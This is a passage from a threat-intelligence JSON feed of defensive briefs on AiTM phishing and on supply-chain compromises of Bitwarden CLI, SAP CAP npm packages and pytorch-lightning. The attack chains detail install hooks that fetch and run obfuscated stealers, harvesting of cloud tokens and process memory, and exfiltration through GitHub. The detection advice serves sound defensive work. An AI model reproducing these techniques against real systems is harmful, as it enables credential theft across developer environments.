{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/credential-theft/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender for Office 365"],"_cs_severities":["high"],"_cs_tags":["phishing","credential-theft","AiTM","token-compromise"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Cloudflare","Paubox"],"content_html":"\u003cp\u003eBetween April 14 and 16, 2026, Microsoft Defender Research observed a sophisticated, large-scale phishing campaign targeting over 35,000 users across more than 13,000 organizations in 26 countries, predominantly in the United States (92%). The campaign, which did not focus on a single vertical, impacted a range of industries, with Healthcare \u0026amp; life sciences (19%), Financial services (18%), Professional services (11%), and Technology \u0026amp; software (11%) being the most affected. Attackers employed code of conduct-themed lures delivered via emails that appeared as internal compliance or regulatory communications. The campaign utilized a multi-step attack chain, including CAPTCHA challenges and intermediate staging pages, to reinforce legitimacy and filter out automated defenses, ultimately leading to an adversary-in-the-middle (AiTM) phishing flow.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attack begins with phishing emails posing as internal compliance communications, using subjects like \u0026ldquo;Internal case log issued under conduct policy\u0026rdquo;.\u003c/li\u003e\n\u003cli\u003eThe emails contain a PDF attachment (e.g., \u0026ldquo;Awareness Case Log File – Tuesday 14th, April 2026.pdf\u0026rdquo;) that claims a \u0026ldquo;code of conduct review\u0026rdquo; has been initiated.\u003c/li\u003e\n\u003cli\u003eRecipients are instructed to click a “Review Case Materials” link within the PDF.\u003c/li\u003e\n\u003cli\u003eClicking the link redirects the user to one of the attacker-controlled domains (e.g., acceptable-use-policy-calendly[.]de).\u003c/li\u003e\n\u003cli\u003eThe landing page displays a Cloudflare CAPTCHA to validate the user and impede automated analysis.\u003c/li\u003e\n\u003cli\u003eAfter CAPTCHA completion, the user is redirected to an intermediate site that informs them the requested documentation is encrypted and requires account authentication.\u003c/li\u003e\n\u003cli\u003eThe user is presented with a legitimate-looking sign-in experience, part of an AiTM phishing flow.\u003c/li\u003e\n\u003cli\u003eThe attackers proxy the authentication session in real time and capture authentication tokens, granting immediate account access.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis campaign resulted in the compromise of authentication tokens, enabling attackers to gain unauthorized access to user accounts and bypass multifactor authentication. With more than 35,000 users targeted across over 13,000 organizations, the potential for widespread data breaches, financial fraud, and further malicious activities is significant. The targeting of sectors like Healthcare and Financial Services indicates a focus on high-value targets with sensitive data.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEducate users about phishing lures, especially those using social engineering tactics and enterprise-style HTML templates.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Suspicious PDF Opening via Uncommon Applications\u0026rdquo; to identify unusual PDF execution paths, based on the \u0026lsquo;file_event\u0026rsquo; log source.\u003c/li\u003e\n\u003cli\u003eConfigure email security settings in Microsoft Defender for Office 365 to filter out phishing emails effectively.\u003c/li\u003e\n\u003cli\u003eEnable network protection to leverage SmartScreen as a host-based web proxy.\u003c/li\u003e\n\u003cli\u003eBlock access to the attacker-controlled domains, such as acceptable-use-policy-calendly[.]de, at the DNS resolver level.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T15:00:00Z","date_published":"2026-05-04T15:00:00Z","id":"/briefs/2026-05-aitm-phishing/","summary":"A widespread phishing campaign utilized 'code of conduct' lures, a multi-step attack chain, and legitimate email services to distribute authenticated messages from attacker-controlled domains, ultimately leading to adversary-in-the-middle (AiTM) token compromise, primarily targeting US-based organizations.","title":"Multi-Stage 'Code of Conduct' Phishing Campaign Leads to AiTM Token Compromise","url":"https://feed.craftedsignal.io/briefs/2026-05-aitm-phishing/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Bitwarden CLI"],"_cs_severities":["critical"],"_cs_tags":["supply-chain","credential-theft","exfiltration","npm"],"_cs_type":"advisory","_cs_vendors":["Bitwarden"],"content_html":"\u003cp\u003eA compromised Bitwarden CLI npm package allows a remote, anonymous attacker to steal credentials and exfiltrate sensitive information. The specific version of the compromised package is not detailed in the advisory. This supply chain attack targets developers and users who rely on the Bitwarden CLI for managing their passwords and secrets. This attack has the potential to expose sensitive credentials, leading to unauthorized access to systems and data. Defenders need to monitor for unusual activity related to the Bitwarden CLI and its usage within their environments to mitigate this risk.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker compromises a Bitwarden CLI npm package through techniques such as typosquatting, account compromise, or dependency confusion.\u003c/li\u003e\n\u003cli\u003eUnsuspecting developers or users download and install the compromised package from the npm registry.\u003c/li\u003e\n\u003cli\u003eDuring installation, the malicious package executes malicious code injected by the attacker.\u003c/li\u003e\n\u003cli\u003eThe malicious code collects Bitwarden credentials and other sensitive information stored in the CLI\u0026rsquo;s configuration.\u003c/li\u003e\n\u003cli\u003eThe compromised package establishes a covert communication channel (e.g., HTTPS) to an attacker-controlled server.\u003c/li\u003e\n\u003cli\u003eStolen credentials and sensitive information are exfiltrated to the attacker\u0026rsquo;s server.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen credentials to access victim\u0026rsquo;s Bitwarden vaults or other systems.\u003c/li\u003e\n\u003cli\u003eThe attacker may further escalate privileges and compromise additional systems within the victim\u0026rsquo;s environment using the stolen credentials.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation leads to the theft of sensitive credentials and information stored within Bitwarden CLI. The number of victims is currently unknown. Organizations using the compromised package could experience unauthorized access to critical systems, data breaches, and potential financial losses. The targeted sectors are broad, encompassing any organization utilizing the Bitwarden CLI for password management and secret storage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor npm package installations for unusual activity or unexpected dependencies using process creation logs and file integrity monitoring.\u003c/li\u003e\n\u003cli\u003eImplement strict code review processes for all third-party dependencies, especially those related to security tools like Bitwarden CLI.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule detecting suspicious network connections from the Bitwarden CLI executable to identify potential data exfiltration.\u003c/li\u003e\n\u003cli\u003eEnforce multi-factor authentication (MFA) on Bitwarden accounts to mitigate the impact of credential theft.\u003c/li\u003e\n\u003cli\u003eRegularly audit and review the permissions and access rights associated with Bitwarden CLI credentials.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T11:28:56Z","date_published":"2026-05-04T11:28:56Z","id":"/briefs/2026-05-bitwarden-cli-compromise/","summary":"A remote attacker can exploit a compromised Bitwarden CLI npm package to steal credentials and exfiltrate sensitive information.","title":"Compromised Bitwarden CLI npm Package Enables Credential Theft and Information Exfiltration","url":"https://feed.craftedsignal.io/briefs/2026-05-bitwarden-cli-compromise/"},{"_cs_actors":["TeamPCP"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["@bitwarden/cli (2026.4.0)","@cap-js/sqlite (2.2.2)","@cap-js/postgres (2.2.2)","@cap-js/db-service (2.10.1)","mbt (1.2.48)","SAP Cloud Application Programming (CAP) Model","checkmarx/kics"],"_cs_severities":["high"],"_cs_tags":["npm","supply-chain","credential-theft","github"],"_cs_type":"threat","_cs_vendors":["npm","GitHub","SAP","Bitwarden","Checkmarx","Microsoft"],"content_html":"\u003cp\u003eThe npm ecosystem is experiencing a surge in sophisticated supply chain attacks following the Shai-Hulud worm in September 2025. Attackers, including TeamPCP, are actively compromising npm packages to gain access to sensitive information and establish persistence within CI/CD pipelines. The attacks have evolved to include wormable propagation, infrastructure-level persistence, and multi-stage payloads designed to evade detection. In April 2026, two campaigns were observed: one included the string \u0026ldquo;Shai-Hulud: The Third Coming,\u0026rdquo; and the other, dubbed \u0026ldquo;Mini Shai-Hulud,\u0026rdquo; targeted the SAP developer ecosystem. The compromised packages are often part of SAP\u0026rsquo;s Cloud Application Programming (CAP) Model and multitarget application (MTA) build toolchain, increasing the likelihood of impacting enterprise developers and CI/CD pipelines with access to cloud credentials and GitHub tokens.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial Compromise: Attackers compromise legitimate npm packages, such as @cap-js/sqlite, @cap-js/postgres, @cap-js/db-service, and mbt, by injecting malicious code.\u003c/li\u003e\n\u003cli\u003eMalicious Code Injection: Compromised packages receive two new files: setup.mjs and execution.js, along with a modified package.json containing a \u0026ldquo;preinstall\u0026rdquo; hook.\u003c/li\u003e\n\u003cli\u003eExecution of setup.mjs: During the \u003ccode\u003enpm install\u003c/code\u003e process, the preinstall hook executes setup.mjs, which detects the host OS and architecture.\u003c/li\u003e\n\u003cli\u003eBun Runtime Download and Execution: setup.mjs downloads the Bun JavaScript runtime (v1.3.13) from GitHub releases and extracts it to a temporary directory.\u003c/li\u003e\n\u003cli\u003eExecution of execution.js: The Bun runtime executes execution.js, a large (11.7 MB) obfuscated credential stealer and propagation framework.\u003c/li\u003e\n\u003cli\u003eCredential Harvesting: execution.js harvests GitHub tokens, npm tokens, environment variables, GitHub Actions secrets, AWS STS identity, Azure Key Vault secrets, GCP Secret Manager values, and Kubernetes service account tokens. It also targets Claude and MCP configuration files and Electrum wallets.\u003c/li\u003e\n\u003cli\u003eData Exfiltration: The collected data is compressed, encrypted, and exfiltrated to freshly created public GitHub repositories with randomized names and descriptions.\u003c/li\u003e\n\u003cli\u003ePropagation: The malware searches for commits containing the keyword \u0026ldquo;OhNoWhatsGoingOnWithGitHub,\u0026rdquo; decodes matching commit messages as a token dead-drop, recovers stolen GitHub tokens, and uses them to spread the malware to other packages.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromised npm packages can lead to the theft of sensitive credentials, including cloud provider credentials, GitHub tokens, and CI/CD secrets. Successful attacks can result in unauthorized access to cloud infrastructure, code repositories, and deployment pipelines. The Mini Shai-Hulud campaign targeted packages with approximately 570,000 weekly downloads, potentially impacting a large number of SAP developers and enterprise environments. The attackers use stolen credentials to further propagate the malware, increasing the scale and scope of the compromise.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRotate npm tokens and GitHub Personal Access Tokens (PATs) immediately if any affected packages were installed (refer to the list of affected packages in the IOC table).\u003c/li\u003e\n\u003cli\u003eMonitor npm install processes for unexpected execution of \u003ccode\u003enode setup.mjs\u003c/code\u003e (see Attack Chain).\u003c/li\u003e\n\u003cli\u003eImplement the Sigma rule \u0026ldquo;Detect Suspicious Bun Process Execution\u0026rdquo; to identify potential execution of the Bun runtime from temporary directories.\u003c/li\u003e\n\u003cli\u003eMonitor network connections for unusual processes connecting to \u003ccode\u003eapi.github[.]com/search/commits?q=OhNoWhatsGoingOnWithGitHub\u003c/code\u003e (see IOCs) to detect potential C2 activity.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Github Commit By Claude Email\u0026rdquo; to identify commits authored with the email \u003ccode\u003eclaude@users.noreply.github.com\u003c/code\u003e to detect malicious commits.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-02T00:10:33Z","date_published":"2026-05-02T00:10:33Z","id":"/briefs/2026-05-npm-supply-chain/","summary":"Threat actors are compromising npm packages, including those targeting SAP developers, to steal credentials, embed themselves in CI/CD pipelines, and deploy multi-stage payloads using techniques like wormable propagation and covert C2 channels on GitHub.","title":"Increased npm Supply Chain Attacks Targeting SAP Developers","url":"https://feed.craftedsignal.io/briefs/2026-05-npm-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["pytorch-lightning"],"_cs_severities":["critical"],"_cs_tags":["supply-chain","pypi","credential-theft","malware"],"_cs_type":"advisory","_cs_vendors":["GitHub"],"content_html":"\u003cp\u003eOn April 30, 2026, two malicious versions (2.6.2 and 2.6.3) of the widely used \u003ccode\u003epytorch-lightning\u003c/code\u003e package were published to the PyPI registry after the publisher account was compromised. These versions contain embedded malicious code designed to steal developer credentials and republish infected versions of repositories to which the stolen tokens have access. The attack is triggered upon importing the package, initiating a background process that silently harvests credentials from a wide array of services, including AWS, Azure, Google Cloud, and GitHub, as well as local environment variables and credential files. Version 2.6.3 was published just 13 minutes after 2.6.2, and was intended to evade detection.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker compromises the publisher account for the \u003ccode\u003epytorch-lightning\u003c/code\u003e package on PyPI.\u003c/li\u003e\n\u003cli\u003eAttacker publishes malicious versions 2.6.2 and 2.6.3 to PyPI.\u003c/li\u003e\n\u003cli\u003eA modified \u003ccode\u003e__init__.py\u003c/code\u003e file within the package initiates a background process upon import.\u003c/li\u003e\n\u003cli\u003eThe background process executes silently, without any visible output or indication of compromise to the user.\u003c/li\u003e\n\u003cli\u003eThe malicious package downloads a runtime (Bun) from GitHub.\u003c/li\u003e\n\u003cli\u003eThe package executes a large, obfuscated JavaScript file, targeting AWS, Azure, Google Cloud, GitHub, and local credential stores.\u003c/li\u003e\n\u003cli\u003eStolen credentials, including cloud provider keys, API tokens, and secrets, are exfiltrated to attacker-controlled infrastructure.\u003c/li\u003e\n\u003cli\u003eThe malware attempts to download and execute a second-stage payload from attacker-controlled infrastructure, expanding the scope of the attack.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eOrganizations that downloaded and used versions 2.6.2 or 2.6.3 of the \u003ccode\u003epytorch-lightning\u003c/code\u003e package are at high risk of compromise. The malicious package is designed to steal a wide range of credentials, including cloud provider keys, API tokens, and secrets stored in environment variables. This can lead to unauthorized access to sensitive data and systems, potentially resulting in data breaches, financial losses, and reputational damage. The malware\u0026rsquo;s ability to download and execute secondary payloads further increases the potential impact.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImmediately remove versions 2.6.2 and 2.6.3 of the \u003ccode\u003elightning\u003c/code\u003e package from all systems where they are installed (see overview).\u003c/li\u003e\n\u003cli\u003eAudit systems for unauthorized processes and review outbound network connections to detect potential compromises (see overview).\u003c/li\u003e\n\u003cli\u003eRotate all cloud provider keys (AWS, Azure, GCP), API tokens (GitHub, CI/CD systems), and secrets stored in environment variables to prevent further unauthorized access (see Attack Chain).\u003c/li\u003e\n\u003cli\u003eImplement the \u003ccode\u003eDetect Suspicious PyPI Package Installation\u003c/code\u003e Sigma rule to identify potential malicious packages being installed in the future (see rules).\u003c/li\u003e\n\u003cli\u003eImplement the \u003ccode\u003eDetect Credential Harvesting via Bun\u003c/code\u003e Sigma rule to catch execution of the malicious JavaScript payload (see rules).\u003c/li\u003e\n\u003cli\u003ePin dependencies to known-good versions and verify package integrity before use to prevent future supply chain attacks (see references).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-01T00:45:31Z","date_published":"2026-05-01T00:45:31Z","id":"/briefs/2026-05-pytorch-lightning-compromise/","summary":"Compromised PyTorch Lightning packages versions 2.6.2 and 2.6.3 on PyPI contain malicious code to steal developer credentials from cloud and developer environments, and republish infected packages.","title":"Compromised PyTorch Lightning Packages on PyPI Steal Developer Credentials","url":"https://feed.craftedsignal.io/briefs/2026-05-pytorch-lightning-compromise/"},{"_cs_actors":["Storm-1747"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender"],"_cs_severities":["high"],"_cs_tags":["email","phishing","credential-theft","Tycoon2FA","BEC"],"_cs_type":"threat","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eIn the first quarter of 2026, Microsoft Threat Intelligence observed a significant rise in email-based phishing threats, totaling approximately 8.3 billion. This increase was driven by surges in QR code phishing (more than doubling over the period), CAPTCHA-gated phishing, and credential phishing attacks. Microsoft\u0026rsquo;s Digital Crime Unit successfully disrupted the Tycoon2FA phishing-as-a-service (PhaaS) platform in early March, leading to a 15% reduction in associated email volume. However, threat actors adapted by shifting hosting providers and domain registration patterns. Business email compromise (BEC) also remained a prevalent threat, with approximately 10.7 million attacks recorded during the quarter, often characterized by low-effort, generic outreach messages. Microsoft Defender Research has also noted the emergence of AI-enabled device code phishing campaigns.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Email Delivery:\u003c/strong\u003e Attackers send phishing emails impersonating legitimate services or organizations. These emails may contain links, QR codes, or HTML attachments.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eVictim Interaction:\u003c/strong\u003e The victim opens the email and clicks on a malicious link or scans a QR code, redirecting them to a phishing page.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePhishing Page Redirection:\u003c/strong\u003e The phishing page mimics a legitimate login portal, such as Microsoft 365 or other enterprise applications.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCredential Harvesting:\u003c/strong\u003e The victim enters their username and password on the phishing page, which are then captured by the attacker.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eMFA Bypass (AiTM):\u003c/strong\u003e For attacks using adversary-in-the-middle (AiTM) techniques (like those facilitated by Tycoon2FA), the attacker intercepts the MFA code and uses it to authenticate.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eAccount Compromise:\u003c/strong\u003e With the stolen credentials and MFA code (if applicable), the attacker gains unauthorized access to the victim\u0026rsquo;s account.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eLateral Movement/Data Theft:\u003c/strong\u003e The attacker uses the compromised account to access sensitive data, send further phishing emails, or move laterally within the organization.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eBusiness Email Compromise:\u003c/strong\u003e In BEC attacks, attackers use compromised accounts or spoofed email addresses to send fraudulent invoices or requests for wire transfers.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe observed email threats in Q1 2026 led to a high risk of credential compromise, financial loss through BEC attacks, and potential data breaches across various sectors. Although the total number of victims is not specified, the billions of phishing attempts indicate a widespread impact. Microsoft\u0026rsquo;s disruption of Tycoon2FA temporarily reduced phishing volumes by 15%, demonstrating the potential for proactive intervention to mitigate these threats. However, threat actors are quickly adapting their techniques, indicating the need for continued vigilance and enhanced security measures. The 10.7 million BEC attacks alone represent a significant financial threat to businesses.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the \u0026ldquo;Detect Tycoon2FA Phishing Attempts\u0026rdquo; Sigma rule to identify email campaigns associated with the Tycoon2FA platform.\u003c/li\u003e\n\u003cli\u003eEnable Microsoft Defender detections to improve detection of phishing emails and malicious payloads.\u003c/li\u003e\n\u003cli\u003eMonitor email traffic for suspicious domain registrations, particularly those using newer generic top-level domains (TLDs) such as .DIGITAL, .BUSINESS, .CONTRACTORS, .CEO, and .COMPANY, and the resurgence of .RU registrations, to identify potential Tycoon2FA infrastructure shifts.\u003c/li\u003e\n\u003cli\u003eEducate users about the dangers of QR code phishing and CAPTCHA-gated attacks, emphasizing the importance of verifying the legitimacy of login pages and email senders, to reduce the effectiveness of phishing campaigns (T1566).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-30T15:00:00Z","date_published":"2026-04-30T15:00:00Z","id":"/briefs/2026-05-email-phishing-trends/","summary":"In Q1 2026, email threats increased, including credential phishing, QR code phishing, and CAPTCHA-gated campaigns, with Microsoft's disruption of the Tycoon2FA phishing platform leading to a 15% volume decrease and shifts in threat actor tactics; BEC activity remained prevalent at 10.7 million attacks.","title":"Q1 2026 Email Threat Landscape: Rise in Phishing Techniques and Tycoon2FA Disruption","url":"https://feed.craftedsignal.io/briefs/2026-05-email-phishing-trends/"},{"_cs_actors":["TeamPCP"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Cloud Application Programming (CAP)","Cloud MTA Build Tool","@cap-js/db-service","@cap-js/postgres","@cap-js/sqlite","github.com"],"_cs_severities":["critical"],"_cs_tags":["supply-chain","npm","sap","credential-theft"],"_cs_type":"threat","_cs_vendors":["SAP","GitHub"],"content_html":"\u003cp\u003eThe Mini Shai-Hulud campaign, active as of April 2026, targets SAP NPM packages used in the SAP Cloud Application Programming (CAP) ecosystem and SAP cloud deployment workflows. Four package versions were compromised: \u003ccode\u003embt 1.2.48\u003c/code\u003e, \u003ccode\u003e@cap-js/db-service 2.10.1\u003c/code\u003e, \u003ccode\u003e@cap-js/postgres 2.2.2\u003c/code\u003e, and \u003ccode\u003e@cap-js/sqlite 2.2.2\u003c/code\u003e. These packages, with over 500,000 combined weekly downloads, are essential for SAP\u0026rsquo;s Cloud MTA Build Tool and database services for CAP software. The attackers injected a preinstall script that fetches and executes a Bun binary, bypassing security monitoring. The malicious versions were available for a short window of 2-4 hours before being unpublished and superseded by clean versions. Wiz attributes this activity to TeamPCP due to a shared RSA public key used to encrypt the exfiltrated secrets.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker compromises an NPM token, possibly exposed through CircleCI.\u003c/li\u003e\n\u003cli\u003eThe attacker injects a malicious \u003ccode\u003epreinstall\u003c/code\u003e script into the targeted SAP NPM packages (\u003ccode\u003embt\u003c/code\u003e, \u003ccode\u003e@cap-js/db-service\u003c/code\u003e, \u003ccode\u003e@cap-js/postgres\u003c/code\u003e, \u003ccode\u003e@cap-js/sqlite\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eWhen a user installs the compromised package, the \u003ccode\u003epreinstall\u003c/code\u003e script executes.\u003c/li\u003e\n\u003cli\u003eThe script fetches a Bun ZIP archive from a GitHub repository.\u003c/li\u003e\n\u003cli\u003eThe script extracts the Bun archive and executes the included Bun binary.\u003c/li\u003e\n\u003cli\u003eThe Bun binary steals local credentials, GitHub and NPM tokens, AWS, Azure, GCP, GitHub Action, and Kubernetes secrets.\u003c/li\u003e\n\u003cli\u003eThe stolen data is exfiltrated to public GitHub repositories with the description \u0026ldquo;A Mini Shai-Hulud has Appeared\u0026rdquo;.\u003c/li\u003e\n\u003cli\u003eThe malware propagates by modifying package tarballs, updating versions, repackaging them, and publishing them using stolen GitHub Actions tokens.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe Mini Shai-Hulud attack poses a significant threat to developers and organizations using SAP CAP, a framework for S/4HANA extensions, Fiori app backends, MTAs, and integration flows. With over 500,000 weekly downloads of the affected packages, a large number of systems could have been affected. Successful exploitation allows attackers to steal sensitive credentials and cloud secrets, potentially leading to unauthorized access to critical SAP systems, cloud infrastructure, and source code repositories. This access could be used for further malicious activities, including data breaches, financial fraud, and supply chain compromise.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eOrganizations using SAP Business Technology Platform workflows, SAP CAP, or MTA-based deployment pipelines should immediately check if they installed the malicious package versions (\u003ccode\u003embt 1.2.48\u003c/code\u003e, \u003ccode\u003e@cap-js/db-service 2.10.1\u003c/code\u003e, \u003ccode\u003e@cap-js/postgres 2.2.2\u003c/code\u003e, \u003ccode\u003e@cap-js/sqlite 2.2.2\u003c/code\u003e) during the exposure window.\u003c/li\u003e\n\u003cli\u003eImplement network monitoring rules to detect connections to unusual GitHub repositories created to host stolen data. Monitor for repositories with the description \u0026ldquo;A Mini Shai-Hulud has Appeared\u0026rdquo;.\u003c/li\u003e\n\u003cli\u003eMonitor process execution for the execution of \u003ccode\u003ebun\u003c/code\u003e binaries in unusual or unexpected locations to identify systems where compromised packages were installed. Deploy the Sigma rule \u003ccode\u003eDetect Bun Execution From NPM Package\u003c/code\u003e to detect this behavior.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-30T14:27:36Z","date_published":"2026-04-30T14:27:36Z","id":"/briefs/2026-04-mini-shai-hulud/","summary":"The Mini Shai-Hulud campaign injected malicious code into SAP NPM packages, targeting credentials and cloud secrets related to SAP Cloud Application Programming (CAP) and SAP cloud deployment workflows, exfiltrating data through public GitHub repositories.","title":"Mini Shai-Hulud Supply Chain Attack Targets SAP NPM Packages","url":"https://feed.craftedsignal.io/briefs/2026-04-mini-shai-hulud/"},{"_cs_actors":["TeamPCP"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Cloud Application Programming Model (CAP)","Cloud MTA"],"_cs_severities":["critical"],"_cs_tags":["supply-chain","credential-theft","npm"],"_cs_type":"threat","_cs_vendors":["SAP"],"content_html":"\u003cp\u003eOn April 29, 2026, security researchers discovered that multiple official SAP npm packages were compromised in a supply-chain attack, suspected to be carried out by TeamPCP. The compromised packages, including \u003ccode\u003e@cap-js/sqlite\u003c/code\u003e (v2.2.2), \u003ccode\u003e@cap-js/postgres\u003c/code\u003e (v2.2.2), \u003ccode\u003e@cap-js/db-service\u003c/code\u003e (v2.10.1), and \u003ccode\u003embt\u003c/code\u003e (v1.2.48), support SAP\u0026rsquo;s Cloud Application Programming Model (CAP) and Cloud MTA, commonly used in enterprise development. The attack involves injecting a malicious \u0026lsquo;preinstall\u0026rsquo; script into these packages, which executes automatically during installation. This script downloads and executes a heavily obfuscated JavaScript payload designed to steal sensitive credentials from developer machines and CI/CD environments. This incident highlights the ongoing risk of supply chain attacks targeting widely used development tools.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Compromise:\u003c/strong\u003e Threat actors compromise official SAP npm packages (\u003ccode\u003e@cap-js/sqlite\u003c/code\u003e, \u003ccode\u003e@cap-js/postgres\u003c/code\u003e, \u003ccode\u003e@cap-js/db-service\u003c/code\u003e, \u003ccode\u003embt\u003c/code\u003e). The exact method of initial compromise is currently unknown, but a misconfigured CircleCI job is suspected.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePackage Modification:\u003c/strong\u003e The compromised npm packages are modified to include a malicious \u0026lsquo;preinstall\u0026rsquo; script.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eInstallation Trigger:\u003c/strong\u003e When developers install the compromised packages using \u003ccode\u003enpm install\u003c/code\u003e, the \u0026lsquo;preinstall\u0026rsquo; script executes automatically.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePayload Download:\u003c/strong\u003e The \u0026lsquo;preinstall\u0026rsquo; script launches a loader named \u003ccode\u003esetup.mjs\u003c/code\u003e that downloads the Bun JavaScript runtime from GitHub.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eExecution of Information Stealer:\u003c/strong\u003e The Bun runtime is used to execute a heavily obfuscated \u003ccode\u003eexecution.js\u003c/code\u003e payload, which acts as an information stealer.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCredential Theft:\u003c/strong\u003e The information stealer targets a wide variety of credentials, including npm and GitHub authentication tokens, SSH keys, cloud credentials for AWS, Azure, and Google Cloud, Kubernetes configurations and secrets, and CI/CD pipeline secrets and environment variables.  It also attempts to extract secrets directly from the CI runner\u0026rsquo;s memory by scanning \u003ccode\u003e/proc/\u0026lt;pid\u0026gt;/maps\u003c/code\u003e and \u003ccode\u003e/proc/\u0026lt;pid\u0026gt;/mem\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eData Exfiltration:\u003c/strong\u003e The stolen data is encrypted and uploaded to public GitHub repositories under the victim\u0026rsquo;s account. These repositories include the description \u0026ldquo;A Mini Shai-Hulud has Appeared\u0026rdquo;.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eLateral Movement:\u003c/strong\u003e The malware searches GitHub commits for the string \u003ccode\u003eOhNoWhatsGoingOnWithGitHub:\u0026lt;base64\u0026gt;\u003c/code\u003e, decoding matching commit messages into GitHub tokens to gain further access and propagate to other packages and repositories, injecting the same malicious code.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis supply chain attack can lead to the theft of sensitive credentials, allowing attackers to gain unauthorized access to internal systems, cloud infrastructure, and source code repositories. The compromised credentials and secrets can be used for lateral movement within the victim\u0026rsquo;s network, data exfiltration, and further supply chain attacks. The use of stolen credentials to modify other packages increases the scope of the attack, potentially impacting a large number of developers and organizations using the compromised SAP packages.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor npm package installations for the presence of \u003ccode\u003epreinstall\u003c/code\u003e scripts executing unusual processes, such as the execution of \u003ccode\u003esetup.mjs\u003c/code\u003e or the download of the Bun JavaScript runtime from GitHub; implement the \u003ccode\u003eDetect Suspicious NPM Package Preinstall Script\u003c/code\u003e Sigma rule.\u003c/li\u003e\n\u003cli\u003eImplement the \u003ccode\u003eDetect GitHub Repository Creation with \u0026quot;A Mini Shai-Hulud has Appeared\u0026quot; Description\u003c/code\u003e 